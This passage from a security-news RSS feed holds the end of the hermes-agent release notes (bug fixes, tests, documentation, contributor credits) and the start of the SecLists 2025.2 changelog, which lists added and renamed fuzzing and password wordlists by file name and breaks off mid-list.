<li><strong>Alibaba provider</strong> hardcoded to wrong endpoint (<a href="https://github.com/NousResearch/hermes-agent/pull/4133" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/4133/hovercard">#4133</a>, closes <a href="https://github.com/NousResearch/hermes-agent/issues/3912" data-hovercard-type="issue" data-hovercard-url="/NousResearch/hermes-agent/issues/3912/hovercard">#3912</a>)</li>
<li><strong>Slack reply_in_thread</strong> missing config option (<a href="https://github.com/NousResearch/hermes-agent/pull/4643" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/4643/hovercard">#4643</a>, closes <a href="https://github.com/NousResearch/hermes-agent/issues/2662" data-hovercard-type="issue" data-hovercard-url="/NousResearch/hermes-agent/issues/2662/hovercard">#2662</a>)</li>
<li><strong>Quiet mode exit code</strong> — successful <code>-q</code> queries no longer exit nonzero (<a href="https://github.com/NousResearch/hermes-agent/pull/4613" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/4613/hovercard">#4613</a>, closes <a href="https://github.com/NousResearch/hermes-agent/issues/4601" data-hovercard-type="issue" data-hovercard-url="/NousResearch/hermes-agent/issues/4601/hovercard">#4601</a>)</li>
<li><strong>Mobile sidebar</strong> shows only close button due to backdrop-filter issue in docs site (<a href="https://github.com/NousResearch/hermes-agent/pull/4207" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/4207/hovercard">#4207</a>) — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/xsmyile/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/xsmyile">@xsmyile</a></li>
<li><strong>Config restore reverted</strong> by stale-branch squash merge — <code>_config_version</code> fixed (<a href="https://github.com/NousResearch/hermes-agent/pull/4440" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/4440/hovercard">#4440</a>)</li>
</ul>
<hr>
<h2>🧪 Testing</h2>
<ul>
<li><strong>Telegram gateway E2E tests</strong> — full integration test suite for the Telegram adapter (<a href="https://github.com/NousResearch/hermes-agent/pull/4497" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/4497/hovercard">#4497</a>) — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/pefontana/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/pefontana">@pefontana</a></li>
<li><strong>11 real test failures fixed</strong> plus sys.modules cascade poisoner resolved (<a href="https://github.com/NousResearch/hermes-agent/pull/4570" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/4570/hovercard">#4570</a>)</li>
<li><strong>7 CI failures resolved</strong> across hooks, plugins, and skill tests (<a href="https://github.com/NousResearch/hermes-agent/pull/3936" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/3936/hovercard">#3936</a>)</li>
<li><strong>Codex 401 refresh tests</strong> updated for CI compatibility (<a href="https://github.com/NousResearch/hermes-agent/pull/4166" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/4166/hovercard">#4166</a>)</li>
<li><strong>Stale OPENAI_BASE_URL test</strong> fixed (<a href="https://github.com/NousResearch/hermes-agent/pull/4217" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/4217/hovercard">#4217</a>)</li>
</ul>
<hr>
<h2>📚 Documentation</h2>
<ul>
<li><strong>Comprehensive documentation audit</strong> — 9 HIGH and 20+ MEDIUM gaps fixed across 21 files (<a href="https://github.com/NousResearch/hermes-agent/pull/4087" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/4087/hovercard">#4087</a>)</li>
<li><strong>Site navigation restructured</strong> — features and platforms promoted to top-level (<a href="https://github.com/NousResearch/hermes-agent/pull/4116" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/4116/hovercard">#4116</a>)</li>
<li><strong>Tool progress streaming</strong> documented for API server and Open WebUI (<a href="https://github.com/NousResearch/hermes-agent/pull/4138" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/4138/hovercard">#4138</a>)</li>
<li><strong>Telegram webhook mode</strong> documentation (<a href="https://github.com/NousResearch/hermes-agent/pull/4089" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/4089/hovercard">#4089</a>)</li>
<li><strong>Local LLM provider guides</strong> — comprehensive setup guides with context length warnings (<a href="https://github.com/NousResearch/hermes-agent/pull/4294" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/4294/hovercard">#4294</a>)</li>
<li><strong>WhatsApp allowlist behavior</strong> clarified with <code>WHATSAPP_ALLOW_ALL_USERS</code> documentation (<a href="https://github.com/NousResearch/hermes-agent/pull/4293" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/4293/hovercard">#4293</a>)</li>
<li><strong>Slack configuration options</strong> — new config section in Slack docs (<a href="https://github.com/NousResearch/hermes-agent/pull/4644" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/4644/hovercard">#4644</a>)</li>
<li><strong>Terminal backends section</strong> expanded + docs build fixes (<a href="https://github.com/NousResearch/hermes-agent/pull/4016" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/4016/hovercard">#4016</a>)</li>
<li><strong>Adding-providers guide</strong> updated for unified setup flow (<a href="https://github.com/NousResearch/hermes-agent/pull/4201" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/4201/hovercard">#4201</a>)</li>
<li><strong>ACP Zed config</strong> fixed (<a href="https://github.com/NousResearch/hermes-agent/pull/4743" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/4743/hovercard">#4743</a>)</li>
<li><strong>Community FAQ</strong> entries for common workflows and troubleshooting (<a href="https://github.com/NousResearch/hermes-agent/pull/4797" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/4797/hovercard">#4797</a>)</li>
<li><strong>Skills browse and search page</strong> on docs site (<a href="https://github.com/NousResearch/hermes-agent/pull/4500" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/4500/hovercard">#4500</a>) — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/IAvecilla/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/IAvecilla">@IAvecilla</a></li>
</ul>
<hr>
<h2>👥 Contributors</h2>
<h3>Core</h3>
<ul>
<li><strong><a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a></strong> — 135 commits across all subsystems</li>
</ul>
<h3>Top Community Contributors</h3>
<ul>
<li><strong><a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/kshitijk4poor/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/kshitijk4poor">@kshitijk4poor</a></strong> — 13 commits: preserve allowed_users during setup (<a href="https://github.com/NousResearch/hermes-agent/pull/4551" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/4551/hovercard">#4551</a>), and various fixes</li>
<li><strong><a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/erosika/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/erosika">@erosika</a></strong> — 12 commits: Honcho full integration parity restored as memory provider plugin (<a href="https://github.com/NousResearch/hermes-agent/pull/4355" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/4355/hovercard">#4355</a>)</li>
<li><strong><a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/pefontana/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/pefontana">@pefontana</a></strong> — 9 commits: Telegram gateway E2E test suite (<a href="https://github.com/NousResearch/hermes-agent/pull/4497" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/4497/hovercard">#4497</a>)</li>
<li><strong><a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/bcross/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/bcross">@bcross</a></strong> — 5 commits: Docker container image optimization (<a href="https://github.com/NousResearch/hermes-agent/pull/4034" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/4034/hovercard">#4034</a>)</li>
<li><strong><a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/SHL0MS/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/SHL0MS">@SHL0MS</a></strong> — 4 commits: NO_COLOR/TERM=dumb support (<a href="https://github.com/NousResearch/hermes-agent/pull/4079" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/4079/hovercard">#4079</a>), ascii-video skill updates (<a href="https://github.com/NousResearch/hermes-agent/pull/4054" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/4054/hovercard">#4054</a>), research-paper-writing skill (<a href="https://github.com/NousResearch/hermes-agent/pull/4654" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/4654/hovercard">#4654</a>)</li>
</ul>
<h3>All Contributors</h3>
<p><a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/0xbyt4/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/0xbyt4">@0xbyt4</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/arasovic/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/arasovic">@arasovic</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Bartok9/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Bartok9">@Bartok9</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/bcross/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/bcross">@bcross</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/binhnt92/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/binhnt92">@binhnt92</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/camden-lowrance/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/camden-lowrance">@camden-lowrance</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/curtitoo/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/curtitoo">@curtitoo</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/dakota/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/dakota">@dakota</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/dave/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/dave">@dave</a> Tist, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/dean/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/dean">@dean</a> Kerr, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/devorun/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/devorun">@devorun</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/dieutx/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/dieutx">@dieutx</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/dilee/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/dilee">@dilee</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/el-analista/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/el-analista">@el-analista</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/erosika/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/erosika">@erosika</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Gutslabs/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Gutslabs">@Gutslabs</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/IAvecilla/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/IAvecilla">@IAvecilla</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jack/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jack">@jack</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Johannnnn506/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Johannnnn506">@Johannnnn506</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/kshitijk4poor/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/kshitijk4poor">@kshitijk4poor</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Laura/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Laura">@Laura</a> Batalha, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Leegenux/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Leegenux">@Leegenux</a>, <a class="user-mention notranslate" data-hovercard-type="organization" data-hovercard-url="/orgs/lume/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/lume">@lume</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/MacroAnarchy/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/MacroAnarchy">@MacroAnarchy</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/maymuneth/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/maymuneth">@maymuneth</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/memosr/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/memosr">@memosr</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/NexVeridian/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/NexVeridian">@NexVeridian</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/nick/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/nick">@nick</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/nils010485/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/nils010485">@nils010485</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/pefontana/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/pefontana">@pefontana</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/PeNov/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/PeNov">@PeNov</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rolme/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rolme">@rolme</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/SHL0MS/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/SHL0MS">@SHL0MS</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/txchen/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/txchen">@txchen</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/xsmyile/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/xsmyile">@xsmyile</a></p>
<h3>Issues Resolved from Community</h3>
<p><a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/acsezen/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/acsezen">@acsezen</a> (<a href="https://github.com/NousResearch/hermes-agent/issues/2537" data-hovercard-type="issue" data-hovercard-url="/NousResearch/hermes-agent/issues/2537/hovercard">#2537</a>), <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/arasovic/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/arasovic">@arasovic</a> (<a href="https://github.com/NousResearch/hermes-agent/issues/4285" data-hovercard-type="issue" data-hovercard-url="/NousResearch/hermes-agent/issues/4285/hovercard">#4285</a>), <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/camden-lowrance/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/camden-lowrance">@camden-lowrance</a> (<a href="https://github.com/NousResearch/hermes-agent/issues/4462" data-hovercard-type="issue" data-hovercard-url="/NousResearch/hermes-agent/issues/4462/hovercard">#4462</a>), <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/devorun/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/devorun">@devorun</a> (<a href="https://github.com/NousResearch/hermes-agent/issues/4601" data-hovercard-type="issue" data-hovercard-url="/NousResearch/hermes-agent/issues/4601/hovercard">#4601</a>), <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/eloklam/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/eloklam">@eloklam</a> (<a href="https://github.com/NousResearch/hermes-agent/issues/4486" data-hovercard-type="issue" data-hovercard-url="/NousResearch/hermes-agent/issues/4486/hovercard">#4486</a>), <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/HenkDz/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/HenkDz">@HenkDz</a> (<a href="https://github.com/NousResearch/hermes-agent/issues/3719" data-hovercard-type="issue" data-hovercard-url="/NousResearch/hermes-agent/issues/3719/hovercard">#3719</a>), <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/hypotyposis/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/hypotyposis">@hypotyposis</a> (<a href="https://github.com/NousResearch/hermes-agent/issues/2153" data-hovercard-type="issue" data-hovercard-url="/NousResearch/hermes-agent/issues/2153/hovercard">#2153</a>), <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/kazamak/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/kazamak">@kazamak</a> (<a href="https://github.com/NousResearch/hermes-agent/issues/4178" data-hovercard-type="issue" data-hovercard-url="/NousResearch/hermes-agent/issues/4178/hovercard">#4178</a>), <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/lstep/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/lstep">@lstep</a> (<a href="https://github.com/NousResearch/hermes-agent/issues/4366" data-hovercard-type="issue" data-hovercard-url="/NousResearch/hermes-agent/issues/4366/hovercard">#4366</a>), <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Mark-Lok/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Mark-Lok">@Mark-Lok</a> (<a href="https://github.com/NousResearch/hermes-agent/issues/4542" data-hovercard-type="issue" data-hovercard-url="/NousResearch/hermes-agent/issues/4542/hovercard">#4542</a>), <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/NoJster/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/NoJster">@NoJster</a> (<a href="https://github.com/NousResearch/hermes-agent/issues/4421" data-hovercard-type="issue" data-hovercard-url="/NousResearch/hermes-agent/issues/4421/hovercard">#4421</a>), <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/patp/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/patp">@patp</a> (<a href="https://github.com/NousResearch/hermes-agent/issues/2662" data-hovercard-type="issue" data-hovercard-url="/NousResearch/hermes-agent/issues/2662/hovercard">#2662</a>), <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/pr0n/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/pr0n">@pr0n</a> (<a href="https://github.com/NousResearch/hermes-agent/issues/4601" data-hovercard-type="issue" data-hovercard-url="/NousResearch/hermes-agent/issues/4601/hovercard">#4601</a>), <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/saulmc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/saulmc">@saulmc</a> (<a href="https://github.com/NousResearch/hermes-agent/issues/4377" data-hovercard-type="issue" data-hovercard-url="/NousResearch/hermes-agent/issues/4377/hovercard">#4377</a>), <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/SHL0MS/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/SHL0MS">@SHL0MS</a> (<a href="https://github.com/NousResearch/hermes-agent/issues/4060" data-hovercard-type="issue" data-hovercard-url="/NousResearch/hermes-agent/issues/4060/hovercard">#4060</a>, <a href="https://github.com/NousResearch/hermes-agent/issues/4061" data-hovercard-type="issue" data-hovercard-url="/NousResearch/hermes-agent/issues/4061/hovercard">#4061</a>, <a href="https://github.com/NousResearch/hermes-agent/issues/4066" data-hovercard-type="issue" data-hovercard-url="/NousResearch/hermes-agent/issues/4066/hovercard">#4066</a>, <a href="https://github.com/NousResearch/hermes-agent/issues/4172" data-hovercard-type="issue" data-hovercard-url="/NousResearch/hermes-agent/issues/4172/hovercard">#4172</a>, <a href="https://github.com/NousResearch/hermes-agent/issues/4277" data-hovercard-type="issue" data-hovercard-url="/NousResearch/hermes-agent/issues/4277/hovercard">#4277</a>), <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Z-Mackintosh/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Z-Mackintosh">@Z-Mackintosh</a> (<a href="https://github.com/NousResearch/hermes-agent/issues/4398" data-hovercard-type="issue" data-hovercard-url="/NousResearch/hermes-agent/issues/4398/hovercard">#4398</a>)</p>
<hr>
<p><strong>Full Changelog</strong>: <a href="https://github.com/NousResearch/hermes-agent/compare/v2026.3.30...v2026.4.3">v2026.3.30...v2026.4.3</a></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[2025.2]]></title>
<description><![CDATA[🎉 The second release of 2025! 🎉
Lead Contributor: @ItsIgnacioPortal
Highlights
🌟 Two new tools for creating and manipulating wordlists have been added to the main readme:

CeWL
WL

🌟 Two 10 Million+ wordlists have been added for subdomain fuzzing/discovery (contributed by @CYFARE):

Discovery/DNS...]]></description>
<link>https://tsecurity.de/de/3487890/it-security-tools/20252/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3487890/it-security-tools/20252/</guid>
<pubDate>Tue, 05 May 2026 02:20:52 +0200</pubDate>
<category>💾 IT Security Tools</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>🎉 The second release of 2025! 🎉<br>
Lead Contributor: <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/ItsIgnacioPortal/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/ItsIgnacioPortal">@ItsIgnacioPortal</a></p>
<h1>Highlights</h1>
<p>🌟 Two new tools for creating and manipulating wordlists have been added to the main readme:</p>
<ul>
<li><a href="https://github.com/digininja/CeWL">CeWL</a></li>
<li><a href="https://github.com/s0md3v/wl">WL</a></li>
</ul>
<p>🌟 Two 10 Million+ wordlists have been added for subdomain fuzzing/discovery (contributed by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/CYFARE/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/CYFARE">@CYFARE</a>):</p>
<ul>
<li><code>Discovery/DNS/FUZZSUBS_CYFARE_1.txt</code></li>
<li><code>Discovery/DNS/FUZZSUBS_CYFARE_2.txt</code></li>
</ul>
<p>🛠 All words wordlists have been moved into the directory <code>Miscellaneous/Words/</code>.</p>
<p>🌐 And many other miscellaneous fixes and improvements.</p>
<h1>Full Changelog</h1>
<h2>🌟 New content</h2>
<ul>
<li>🌟 feat(wordlist): Add more keyboard walks (PR <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="2894771682" data-permission-text="Title is private" data-url="https://github.com/danielmiessler/SecLists/issues/1183" data-hovercard-type="pull_request" data-hovercard-url="/danielmiessler/SecLists/pull/1183/hovercard" href="https://github.com/danielmiessler/SecLists/pull/1183">#1183</a>) - BuildAndDestroy</li>
<li>🌟 feat(wordlist): Added 'Pipfile' entries to 'common.txt' (PR <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="2909801111" data-permission-text="Title is private" data-url="https://github.com/danielmiessler/SecLists/issues/1187" data-hovercard-type="pull_request" data-hovercard-url="/danielmiessler/SecLists/pull/1187/hovercard" href="https://github.com/danielmiessler/SecLists/pull/1187">#1187</a>) - Dominique RIGHETTO</li>
<li>🌟 feat(wordlist): Added <code>image/jpg</code> to <code>web-all-content-types.txt</code> (PR <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="2988655357" data-permission-text="Title is private" data-url="https://github.com/danielmiessler/SecLists/issues/1190" data-hovercard-type="pull_request" data-hovercard-url="/danielmiessler/SecLists/pull/1190/hovercard" href="https://github.com/danielmiessler/SecLists/pull/1190">#1190</a>) - bl13pbl03p</li>
<li>🌟 feat(wordlist): Added DNS subdomain 'take-survey' (PR <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="2891022313" data-permission-text="Title is private" data-url="https://github.com/danielmiessler/SecLists/issues/1182" data-hovercard-type="pull_request" data-hovercard-url="/danielmiessler/SecLists/pull/1182/hovercard" href="https://github.com/danielmiessler/SecLists/pull/1182">#1182</a>) - jvardikar</li>
<li>🌟 feat(wordlist): Added new combo to 'ssh-betterdefaultpasslist.txt' Implements <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="2881025434" data-permission-text="Title is private" data-url="https://github.com/danielmiessler/SecLists/issues/1180" data-hovercard-type="pull_request" data-hovercard-url="/danielmiessler/SecLists/pull/1180/hovercard" href="https://github.com/danielmiessler/SecLists/pull/1180">#1180</a> - ItsIgnacioPortal</li>
<li>🌟 feat(wordlist): Content type application/x-httpd-php - zar3bski</li>
<li>🌟 feat(wordlist): Created 10 Million+ List For Subdomain Fuzzing/Discovery - CYFARE</li>
</ul>
<h2>🛠 Fixes &amp; Improvements</h2>
<ul>
<li>🛠 fix(wordlist): Added missing terms to API Actions wordlist - ItsIgnacioPortal</li>
<li>🛠 fix(wordlist): Fixed file extension of the 'corporate_passwords' wordlist - ItsIgnacioPortal</li>
<li>🛠 fix(wordlist): Merged duplicate dutch wordlists - ItsIgnacioPortal</li>
<li>🛠 fix(wordlist): Removed religious term from wordlist (PR <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="2889334496" data-permission-text="Title is private" data-url="https://github.com/danielmiessler/SecLists/issues/1181" data-hovercard-type="pull_request" data-hovercard-url="/danielmiessler/SecLists/pull/1181/hovercard" href="https://github.com/danielmiessler/SecLists/pull/1181">#1181</a>) - Machiavelli</li>
<li>🛠 fix(wordlist): Renamed 'german_misc.txt' to 'German-words.txt' - ItsIgnacioPortal</li>
<li>🛠 fix(wordlist): Renamed 'richelieu' french passwords wordlists - ItsIgnacioPortal</li>
<li>🛠 fix(docs): Added reference to the pwdb-public project - ItsIgnacioPortal</li>
<li>🛠 fix(docs): Fixed bad formatting on Discovery/Web-Content readme - ItsIgnacioPortal</li>
<li>🛠 fix(docs): Fixed formatting on EFF-Dice documentation - ItsIgnacioPortal</li>
<li>🛠 fix(docs): Fixed wording on the 'Cook' tool description - ItsIgnacioPortal</li>
<li>🛠 fix(docs): Removed duplicate content from readme - ItsIgnacioPortal</li>
<li>🛠 fix(cicd): More descriptive workflow names - ItsIgnacioPortal</li>
<li>🛠 fix(cicd): Updated 'GITHUB_REPOSITORY' variable name - ItsIgnacioPortal</li>
<li>🛠 fix(cicd): Updated 'tj-actions/changed-files' from v34 to v45.0.7 - ItsIgnacioPortal</li>
</ul>
<h2>📖 Documentation</h2>
<ul>
<li>📖 feat(docs): Added 'CeWL' tool - ItsIgnacioPortal</li>
<li>📖 feat(docs): Added 'wl' tool - ItsIgnacioPortal</li>
<li>📖 feat(docs): Added 'Wordlist Tools' category to main README - ItsIgnacioPortal</li>
<li>📖 feat(docs): Added documentation for 'French-common-password-list-top-*' - ItsIgnacioPortal</li>
<li>📖 feat(docs): Added documentation for 'probable-v2-top*' - ItsIgnacioPortal</li>
<li>📖 feat(docs): Added documentation for the 'Miscellaneous/Words' directory - ItsIgnacioPortal</li>
